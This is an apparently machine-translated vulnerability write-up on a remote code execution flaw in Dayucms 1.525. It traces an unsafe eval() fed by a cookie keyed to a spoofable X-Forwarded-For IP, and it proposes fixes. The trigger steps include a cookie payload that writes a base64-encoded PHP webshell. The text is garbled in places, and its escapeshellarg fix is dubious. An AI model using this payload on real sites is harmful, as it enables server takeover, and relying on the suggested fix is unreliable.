Dayucms 1.525/include/global.func.php Foreground arbitrary Code execution

Catalog

1 . Vulnerability Description 2 . Vulnerability trigger Condition 3 . Vulnerability Impact Range 4 . Vulnerability Code Analysis 5 . Defense Methods 6. Defensive thinking

1. Vulnerability description

Relevant Link:

http://joychou.org/index.php/web/dayucms-1-526-foreground-remote-code-execution.htmlhttp: // www.wooyun.org/bugs/wooyun-2014-087518

2. Vulnerability Trigger Condition

1 . IP can be spoofed with XSS, so the cookiekey can be fixed to: B98b87d11653f2da2. First visit/pay/order.php, get the cookie prefix, and then splicing with Cookiekey, get the cookie key value is: Cbpcmsntnab98b87d11653f2da// this way, when you access pay/order.php again, Get_cookie no longer returns the Flase,string2array function to get the call 3. Then modify the x_forwarded_for to 0. 0.0. 0 4 Create a new cookie with the content 1;fputs (fopen (Base64_decode (Sm95q2hvds5waha), W), Base64_decode ( PD9WAHAKYXNZZXJ0KAOKX1BPU1RBEF0KKTSKPZ4))5. Code execution

3. Vulnerability Impact Range
4. Vulnerability Code Analysis

/include/global.func.php

//string conversions to arraysfunction String2array ($str) {if(Disablefunc ('Eval')) Exit ('function eval is disabled and may not work properly with this system!'); if($str = ="')returnArray (); if(Is_array ($STR))return$STR;//2011-09-13 is an array of words to return directly//assign a string to an array directly using Eval@eval ("\ $array = $str;"); return$array;}

Continue backtracking function caller
/pay/order.php

$payobj =New pay  (); $action=isset ($action)? $action:'step1'  //  $cookiekey =dayucms_md5 ('productarray'). IP); $productarray=string2array (Get_cookie ($cookiekey));

IP declaration in/include/common.inc.php

Define ('IP', GetIP ());

include/global.func.php

//Get IP Addressfunction GetIP () {$ip='Unknown IP'; if(!empty ($_server['http_client_ip']))    {        returnIS_IP ($_server['http_client_ip'])? $_server['http_client_ip']: $ip; } elseif (!empty ($_server['http_x_forwarded_for']))    {        //IP can be forged using x-forwarded-for        returnIS_IP ($_server['http_x_forwarded_for'])? $_server['http_x_forwarded_for']: $ip; }    Else    {        returnIS_IP ($_server['REMOTE_ADDR'])? $_server['REMOTE_ADDR']: $ip; }}

nclude/global.func.php

function Get_cookie ($var) {    $var = cookie_pre.$var;     return isset ($_cookie[$var]) $_cookie[$var]:false;}

The normal use of the String2array function is

' Array ("Hello" = "world") '  =// at this point the $arr is an array

However, if the String2array function parameter is $str 1;echo 222 , then because Eval can execute multiple statements separated by semicolons, the code becomes the @eval("\$array = 1;echo 222;"); result of code execution

5. Defense Methods

/include/global.func.php

//string conversions to arraysfunction String2array ($str) {if(Disablefunc ('Eval')) Exit ('function eval is disabled and may not work properly with this system!'); if($str = ="')returnArray (); if(Is_array ($STR))return$STR;//2011-09-13 is an array of words to return directly    /**/$str=Escapeshellarg ($STR); /**/@eval ("\ $array = $str;"); return$array;}

6. Defensive Thinking

Prevention of 0x1:php Command injection Attack vulnerability

1try not to execute external applications or commands2use a custom function or library to implement the functionality of an external application or command3determine the contents of a parameter before performing functions such as system, eval, etc.4. Use the Escapeshellarg function to handle related parameters. The Escapeshellarg function escapes any character that causes a parameter or command to end, such as1) Single quotation marks"'"will be escaped to"\ '"    2) Double quotation marks"""will be escaped to"\""    3) semicolon";"will be escaped to"\;"this restricts the contents of the argument to a pair of single or double quotes, escaping the single or double quotation marks contained in the parameter, so that it cannot truncate the current execution and escapeshellarg the purpose of preventing command injection attacks.//Escapeshellarg () adds a single quotation mark to the string and can reference or transcode any existing single quotes, ensuring that a string is passed directly to the shell function and is safe. This function should be used for some parameters entered by the user. Shell functions include exec (), System () execution operator5. Executes the executable file path using Safe_mode_exec_dir. Set the Safe_mode in the php.ini file to on, then put the allowed files into a directory and use Safe_mode_exec_dir to specify the executable file path. This way, the program must be allowed to execute in the directory specified by Safe_mode_exec_dir when it is necessary to execute the appropriate external program, otherwise execution will fail

Relevant Link:

http://php.net/manual/zh/function.escapeshellarg.phphttp://www.rising.com.cn/ Newsletter/news/2012-06-27/11810.html

Copyright (c) Little5ann All rights reserved

Dayucms 1.525/include/global.func.php Foreground arbitrary Code execution